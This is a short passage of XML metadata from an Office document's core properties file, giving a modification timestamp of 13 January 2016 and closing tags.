  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-13T15:19:15Z</dcterms:modified>
</cp:coreProperties>
</file>